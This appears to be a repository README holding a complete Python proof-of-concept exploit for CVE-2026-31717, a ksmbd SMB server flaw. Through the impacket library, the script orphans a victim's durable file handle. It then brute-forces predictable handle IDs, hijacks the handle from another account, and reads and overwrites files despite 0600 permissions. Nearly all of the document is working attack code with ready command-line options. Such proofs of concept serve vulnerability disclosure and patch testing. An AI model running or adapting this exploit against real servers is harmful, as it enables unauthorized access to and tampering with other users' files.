README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-31717 — ksmbd DHnC durable-handle reconnect access-control bypass
==========================================================================
smb2_check_durable_oplock() in fs/smb/server/oplock.c falls through the
non-lease branch (oplock.c:1852-1864 `goto out`) without verifying the
reconnecting user. parse_durable_handle_context() (smb2pdu.c:2796) only
looks up by attacker-supplied persistent_id; idr_alloc_cyclic() makes
those IDs trivially predictable.
Impact: any authenticated SMB user can hijack an orphaned v1 durable
handle belonging to another user. Subsequent read/write goes through
the original opener's struct file (fp->filp), so kernel_read/write use
the victim's f_cred — bypassing POSIX ACLs.
Affected dialects: SMB 2.1 (0x0210) and above. v1 (DHnQ/DHnC) is the
bruteforceable path; v2 (DH2C) gates by 128-bit CreateGuid.
Public reference:
https://lore.kernel.org/linux-cve-announce/2026050124-CVE-2026-31717-f68b@gregkh/
Modes:
acl-bypass POSIX-0600 ACL-bypass demonstration (headline)
victim Phase 1 only — open + orphan (cross-host setup)
attack Phase 2 only — bruteforce a PID range (cross-host setup)
"""
import argparse
import socket
import struct
import sys
import time
from impacket.smbconnection import SMBConnection
from impacket import smb3, smb3structs as s
from impacket.nt_errors import STATUS_SUCCESS
STATUS_ACCESS_DENIED = 0xC0000022
DIALECT_MAP = {
"2.1": s.SMB2_DIALECT_21,
"3.0": s.SMB2_DIALECT_30,
"3.1.1": s.SMB2_DIALECT_311,
}
# ── Helpers to build raw create contexts ────────────────────────────
def build_create_context(name, data, is_last=True):
"""Build a single SMB2_CREATE_CONTEXT blob.
name: 4-byte context name (e.g. b"DHnQ")
data: context data bytes
is_last: if False, sets Next pointer for chaining"""
name_offset = 16 # fixed header size = where Name starts
name_length = len(name)
# Data must be 8-byte aligned after name
name_padded_len = (name_length + 7) & ~7
data_offset = name_offset + name_padded_len
data_length = len(data)
total_size = data_offset + data_length
# Next must be 8-byte aligned
next_offset = 0 if is_last else ((total_size + 7) & ~7)
hdr = struct.pack("<I HH HH I",
next_offset,
name_offset,
name_length,
0, # Reserved
data_offset,
data_length)
buf = hdr + name + b"\x00" * (name_padded_len - name_length) + data
if not is_last:
# Pad to 8-byte alignment for next context
pad = next_offset - len(buf)
if pad > 0:
buf += b"\x00" * pad
return buf
def build_dhnq_context():
"""DHnQ - Durable Handle Request v1.
Data is 16 bytes of zeros."""
return build_create_context(b"DHnQ", b"\x00" * 16)
def build_dhnc_context(persistent_id):
"""DHnC - Durable Handle Reconnect v1.
Data is SMB2_FILEID: PersistentFileId(8) + VolatileFileId(8)."""
data = struct.pack("<QQ", persistent_id, 0)
return build_create_context(b"DHnC", data)
# ── SMB2 client wrapper using impacket ──────────────────────────────
class KsmbdClient:
"""Thin wrapper around impacket's SMBConnection for the exploit."""
def __init__(self, target, port=445):
self.target = target
self.port = port
self.conn = None
self.tree_id = None
def connect_and_auth(self, username, password, domain="", dialect="3.0"):
"""Connect, negotiate the requested dialect, authenticate."""
self.conn = SMBConnection(self.target, self.target, sess_port=self.port,
preferredDialect=DIALECT_MAP[dialect],
timeout=30)
self.conn.login(username, password, domain)
print(f" [+] Authenticated as '{username}' over SMB {dialect}, "
f"session=0x{self.conn.getSMBServer()._Session['SessionID']:X}")
def tree_connect(self, share):
"""Connect to a share."""
self.tree_id = self.conn.connectTree(share)
print(f" [+] Connected to {share}, tree=0x{self.tree_id:X}")
def create_durable(self, filename):
"""Open/create file with batch oplock + DHnQ (v1 durable handle request).
Returns (persistent_id, volatile_id, file_id_tuple)."""
smb = self.conn.getSMBServer()
# Build CREATE request manually for full control over oplock + contexts
pkt = smb3.SMB2Packet()
pkt['Command'] = s.SMB2_CREATE
pkt['TreeID'] = self.tree_id
create_req = s.SMB2Create()
create_req['SecurityFlags'] = 0
create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
create_req['DesiredAccess'] = (s.FILE_READ_DATA | s.FILE_WRITE_DATA |
s.FILE_READ_ATTRIBUTES | s.DELETE |
s.SYNCHRONIZE)
create_req['FileAttributes'] = s.FILE_ATTRIBUTE_NORMAL
create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
# FILE_OVERWRITE_IF truncates if existing — keeps the demo's read
# output clean (no leftover placeholder bytes after the secret).
create_req['CreateDisposition'] = s.FILE_OVERWRITE_IF
create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE
# Filename
name_bytes = filename.encode("utf-16-le")
create_req['NameLength'] = len(name_bytes)
# Create context: DHnQ (durable handle request)
dhnq = build_dhnq_context()
create_req['CreateContextsLength'] = len(dhnq)
# Assemble buffer: name + padding + contexts
name_padded = name_bytes + b"\x00" * ((8 - len(name_bytes) % 8) % 8)
create_req['Buffer'] = name_padded + dhnq
# Fix offsets (relative to start of SMB2 header)
# SMB2 header = 64 bytes, CREATE fixed body = 56 bytes (StructureSize=57, odd)
name_offset = 64 + 56 # 120
ctx_offset = name_offset + len(name_padded)
create_req['NameOffset'] = name_offset
create_req['CreateContextsOffset'] = ctx_offset
pkt['Data'] = create_req
smb.sendSMB(pkt)
resp = smb.recvSMB()
status = resp['Status']
if status != STATUS_SUCCESS:
raise RuntimeError(f"CREATE failed: 0x{status:08X}")
create_resp = s.SMB2Create_Response(resp['Data'])
oplock = create_resp['OplockLevel']
pid = create_resp['FileID'].fields['Persistent']
vid = create_resp['FileID'].fields['Volatile']
print(f" [+] Opened '{filename}' - oplock=0x{oplock:02X}, "
f"persistent_id={pid}, volatile_id={vid}")
if oplock != s.SMB2_OPLOCK_LEVEL_BATCH:
print(f" [!] WARNING: Got oplock 0x{oplock:02X}, not BATCH (0x09)")
file_id = s.SMB2_FILEID()
file_id['Persistent'] = pid
file_id['Volatile'] = vid
return pid, vid, file_id
def create_reconnect_dhnc(self, persistent_id):
"""Attempt DHnC reconnect to an orphaned durable handle.
Returns (persistent_id, volatile_id, file_id) on success, None on failure."""
smb = self.conn.getSMBServer()
pkt = smb3.SMB2Packet()
pkt['Command'] = s.SMB2_CREATE
pkt['TreeID'] = self.tree_id
create_req = s.SMB2Create()
create_req['SecurityFlags'] = 0
create_req['RequestedOplockLevel'] = s.SMB2_OPLOCK_LEVEL_BATCH
create_req['ImpersonationLevel'] = s.SMB2_IL_IMPERSONATION
# DesiredAccess MUST be non-zero - ksmbd rejects 0 at smb2pdu.c:3090
# before reaching the durable context handler. Use minimal read access.
create_req['DesiredAccess'] = s.FILE_READ_DATA | s.FILE_WRITE_DATA
create_req['FileAttributes'] = 0
create_req['ShareAccess'] = s.FILE_SHARE_READ | s.FILE_SHARE_WRITE
create_req['CreateDisposition'] = s.FILE_OPEN
create_req['CreateOptions'] = s.FILE_NON_DIRECTORY_FILE
# Empty filename
create_req['NameLength'] = 0
# DHnC context with target persistent_id
dhnc = build_dhnc_context(persistent_id)
create_req['CreateContextsLength'] = len(dhnc)
# Buffer: pad for name area + contexts
name_pad = b"\x00" * 8
create_req['Buffer'] = name_pad + dhnc
name_offset = 64 + 56
ctx_offset = name_offset + len(name_pad)
create_req['NameOffset'] = name_offset
create_req['CreateContextsOffset'] = ctx_offset
pkt['Data'] = create_req
smb.sendSMB(pkt)
resp = smb.recvSMB()
status = resp['Status']
if status != STATUS_SUCCESS:
if status != 0xC0000034: # STATUS_OBJECT_NAME_NOT_FOUND (expected for non-existent IDs)
print(f" [*] pid={persistent_id}: status=0x{status:08X}")
return None
create_resp = s.SMB2Create_Response(resp['Data'])
pid = create_resp['FileID'].fields['Persistent']
vid = create_resp['FileID'].fields['Volatile']
file_id = s.SMB2_FILEID()
file_id['Persistent'] = pid
file_id['Volatile'] = vid
return pid, vid, file_id
def normal_create_status(self, filename, access=s.FILE_READ_DATA):
"""Plain CREATE with no DH context. Used as the ACL control test:
on a 0600 file owned by another user, ksmbd must return
STATUS_ACCESS_DENIED. Returns the NT status code (success or error)."""
try:
file_id = self.conn.openFile(self.tree_id, filename,
desiredAccess=access,
shareMode=s.FILE_SHARE_READ,
creationDisposition=s.FILE_OPEN)
try:
self.conn.closeFile(self.tree_id, file_id)
except Exception:
pass
return STATUS_SUCCESS
except Exception as e:
msg = str(e).upper()
# impacket raises with status hex/name in the string
if "ACCESS_DENIED" in msg or "C0000022" in msg:
return STATUS_ACCESS_DENIED
for tok in msg.replace(",", " ").split():
if tok.startswith("0X"):
try:
return int(tok, 16)
except ValueError:
pass
raise
def read_file(self, file_id, offset=0, length=4096):
"""Read from an open file handle."""
smb = self.conn.getSMBServer()
pkt = smb3.SMB2Packet()
pkt['Command'] = s.SMB2_READ
pkt['TreeID'] = self.tree_id
read_req = s.SMB2Read()
read_req['Padding'] = 0x50
read_req['Length'] = length
read_req['Offset'] = offset
read_req['FileID'] = file_id
read_req['MinimumCount'] = 0
read_req['RemainingBytes'] = 0
pkt['Data'] = read_req
smb.sendSMB(pkt)
resp = smb.recvSMB()
status = resp['Status']
if status != STATUS_SUCCESS:
raise RuntimeError(f"READ failed: 0x{status:08X}")
read_resp = s.SMB2Read_Response(resp['Data'])
return read_resp['Buffer']
def write_file(self, file_id, data, offset=0):
"""Write to an open file handle."""
smb = self.conn.getSMBServer()
pkt = smb3.SMB2Packet()
pkt['Command'] = s.SMB2_WRITE
pkt['TreeID'] = self.tree_id
write_req = s.SMB2Write()
write_req['FileID'] = file_id
write_req['Length'] = len(data)
write_req['Offset'] = offset
write_req['WriteChannelInfoOffset'] = 0
write_req['WriteChannelInfoLength'] = 0
write_req['Channel'] = 0
write_req['RemainingBytes'] = 0
write_req['Flags'] = 0
write_req['Buffer'] = data
pkt['Data'] = write_req
smb.sendSMB(pkt)
resp = smb.recvSMB()
status = resp['Status']
if status != STATUS_SUCCESS:
raise RuntimeError(f"WRITE failed: 0x{status:08X}")
write_resp = s.SMB2Write_Response(resp['Data'])
return write_resp['Count']
def disconnect_orphan(self, graceful=False):
"""Drop the session WITHOUT closing the durable handle.
Default: TCP RST via SO_LINGER {1, 0} — models a real orphan event
(laptop sleep, WiFi roam, VPN flap, NIC down). graceful=True sends
SMB2 LOGOFF + FIN instead. Either way, fp->conn becomes NULL and the
handle persists in global_ft until the durable scavenger reaps it.
"""
try:
sock = self.conn.getSMBServer().get_socket()
except Exception:
sock = None
if not graceful and sock is not None:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack("ii", 1, 0))
sock.close()
print(" [+] TCP RST sent — handle orphaned in ksmbd")
self.conn = None
return
except Exception as e:
print(f" [!] RST failed ({e}); falling back to graceful close")
try: self.conn.logoff()
except Exception: pass
try: self.conn.getSMBServer().close_session()
except Exception: pass
print(" [+] Session graceful logoff (LOGOFF + FIN) — handle orphaned")
self.conn = None
# ── Exploit phases ──────────────────────────────────────────────────
def phase_victim(args, secret=b"1337 stuff\n"):
"""Phase 1: Victim opens a file with batch oplock + durable handle,
writes sensitive data, then disconnects (TCP RST by default)."""
print("[*] Phase 1: Victim creates durable handle")
print(f" Target: {args.target}:{args.port}")
print(f" Share: {args.share}")
print(f" User: {args.user}")
print(f" File: {args.file}")
c = KsmbdClient(args.target, args.port)
c.connect_and_auth(args.user, args.password, args.domain, dialect=args.dialect)
c.tree_connect(args.share)
pid, _, fid = c.create_durable(args.file)
written = c.write_file(fid, secret)
print(f" [+] Wrote {written} bytes of sensitive data")
data = c.read_file(fid, length=len(secret))
print(f" [+] Verified read: {data[:50]}...")
print(f"\n [*] Persistent ID to target: {pid}")
c.disconnect_orphan(graceful=args.graceful)
print(f" [+] Handle {pid} orphaned (persists until durable scavenger timeout).\n")
return pid
def phase_attack(args, known_pid=None):
"""Phase 2: Attacker brute-forces persistent IDs to hijack
an orphaned v1 durable handle via DHnC."""
print("[*] Phase 2: Attacker hijacks orphaned durable handle")
atk_user = getattr(args, "user2", None) or args.user
atk_pass = getattr(args, "password2", None) or args.password
print(f" Target: {args.target}:{args.port}")
print(f" User: {atk_user}")
pid_start = getattr(args, "pid_start", 0)
pid_end = getattr(args, "pid_end", 64)
print(f" Brute-force range: {pid_start}-{pid_end}")
c = KsmbdClient(args.target, args.port)
c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect)
c.tree_connect(args.share)
print(f" [*] Scanning persistent IDs for orphaned durable handles...")
scan_range = list(range(pid_start, pid_end + 1))
if known_pid is not None:
# Try known PID first
if known_pid in scan_range:
scan_range.remove(known_pid)
scan_range.insert(0, known_pid)
hijacked = []
for pid in scan_range:
try:
result = c.create_reconnect_dhnc(pid)
except Exception as e:
# Connection may reset - reconnect
print(f" [*] Error at pid={pid}: {e}, reconnecting...")
try:
c = KsmbdClient(args.target, args.port)
c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect)
c.tree_connect(args.share)
except Exception:
print(f" [!] Reconnect failed, aborting scan")
break
continue
if result is None:
if pid % 10 == 0 and pid != known_pid:
sys.stdout.write(f"\r [*] Scanned pid={pid}...")
sys.stdout.flush()
continue
_, _, new_fid = result
print(f"\n [!!] HIJACKED persistent_id={pid} as '{atk_user}'")
try:
data = c.read_file(new_fid, length=4096).rstrip(b"\x00").rstrip()
print(f" [!!] READ {len(data)} bytes: {data!r}")
except Exception as e:
print(f" [*] Read attempt: {e}")
try:
written = c.write_file(new_fid, b"It's my session now :)\n", offset=0)
print(f" [!!] WROTE {written} bytes (overwrote victim's content)")
except Exception as e:
print(f" [*] Write attempt: {e}")
hijacked.append(pid)
break # Got one
if not hijacked:
print(f"\n [-] No orphaned durable handles found in range {pid_start}-{pid_end}")
else:
print(f"\n [+] Successfully hijacked {len(hijacked)} handle(s): {hijacked}")
return hijacked
def phase_acl_bypass(args):
"""Headline scenario: prove POSIX 0600 ACL bypass.
Step c (control before) and step e (control after) bracket the exploit:
if normal CREATE is denied to the attacker both before AND after the
hijack, but the attacker can read+write via DHnC reconnect, then
f_cred-bypass is the only explanation."""
print("=" * 70)
print("CVE-2026-31717 PoC — POSIX ACL bypass via DHnC durable-handle hijack")
print("=" * 70)
print()
atk_user, atk_pass = args.user2, args.password2
rw = s.FILE_READ_DATA | s.FILE_WRITE_DATA
def attacker_session():
c = KsmbdClient(args.target, args.port)
c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect)
c.tree_connect(args.share)
return c
def control_check(c, label):
st = c.normal_create_status(args.file, access=rw)
if st == STATUS_ACCESS_DENIED:
print(f" [+] CONTROL {label}: normal CREATE → STATUS_ACCESS_DENIED ✓")
return True
print(f" [!] CONTROL {label}: status=0x{st:08X} (expected 0xC0000022)")
return False
# (a) Victim opens, writes, abrupt-disconnects.
pid = phase_victim(args, secret=b"TOP SECRET\n")
print("[*] Waiting 3 seconds for ksmbd to mark the handle orphaned...")
time.sleep(3)
# (b)+(c) Attacker authenticates and proves it can't reach the file normally.
print(f"\n[*] Phase 2: Attacker '{atk_user}' attempts ACL bypass")
c = attacker_session()
if not control_check(c, "pre-exploit"):
print(f" Server-side ACL setup is wrong ({atk_user} can already "
f"access {args.file}). Aborting demo.")
return
# (d) Exploit: DHnC reconnect, read+write through victim's f_cred.
print(f"\n [*] DHnC reconnect to known pid={pid}")
result = c.create_reconnect_dhnc(pid)
if result is None:
print(f" [-] direct reconnect failed; brute-forcing pid±2")
try: c.disconnect_orphan(graceful=True)
except Exception: pass
args.pid_start, args.pid_end = max(0, pid - 2), pid + 2
if not phase_attack(args, known_pid=pid):
print(" [-] No handle hijacked. Was the victim's pid reaped already?")
return
_, _, new_fid = result
print(f" [!!] HIJACKED persistent_id={pid}")
data = c.read_file(new_fid, length=4096).rstrip(b"\x00")
print(f" [!!] READ as {atk_user}: {data!r} (POSIX 0600 bypassed)")
written = c.write_file(new_fid, f"PWNED by {atk_user}\n".encode())
print(f" [!!] WROTE {written} bytes as {atk_user} (POSIX 0600 bypassed)")
# (e) Reconnect cleanly and prove the file mode is unchanged.
try: c.disconnect_orphan(graceful=True)
except Exception: pass
print()
if control_check(attacker_session(), "post-exploit"):
print(f" File POSIX mode unchanged; writes only succeeded because "
f"the hijacked fp->filp carried the victim's f_cred.")
print(f"\n [+] Server-side verification (run on the ksmbd host):")
print(f" stat {args.file} && cat {args.file}")
print(f" Expect: 0600 victim:victim, contents = 'PWNED by {atk_user}\\n'")
# ── Main ────────────────────────────────────────────────────────────
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-31717: ksmbd DHnC durable-handle hijack PoC",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=__doc__
)
sub = parser.add_subparsers(dest="mode", required=True)
for name, help_text in [("victim", "Create durable handle as victim"),
("attack", "Hijack orphaned handle as attacker"),
("acl-bypass", "Headline: POSIX 0600 ACL bypass")]:
p = sub.add_parser(name, help=help_text)
p.add_argument("--target", required=True, help="ksmbd server IP")
p.add_argument("--port", type=int, default=445)
p.add_argument("--share", required=True, help="Share name")
p.add_argument("--user", required=True, help="Username")
p.add_argument("--password", required=True, help="Password")
p.add_argument("--domain", default="")
p.add_argument("--dialect", choices=list(DIALECT_MAP.keys()), default="3.0",
help="SMB dialect to negotiate (default: 3.0; 2.1 also works)")
p.add_argument("--graceful", action="store_true",
help="Use SMB2 LOGOFF + FIN instead of TCP RST when orphaning")
if name in ("victim", "acl-bypass"):
p.add_argument("--file", default="secret.txt")
if name == "attack":
p.add_argument("--pid-start", type=int, default=0)
p.add_argument("--pid-end", type=int, default=64)
if name == "acl-bypass":
p.add_argument("--user2", required=True, help="Attacker username")
p.add_argument("--password2", required=True, help="Attacker password")
args = parser.parse_args()
if args.mode == "victim":
phase_victim(args)
elif args.mode == "attack":
phase_attack(args)
elif args.mode == "acl-bypass":
phase_acl_bypass(args)
if __name__ == "__main__":
main()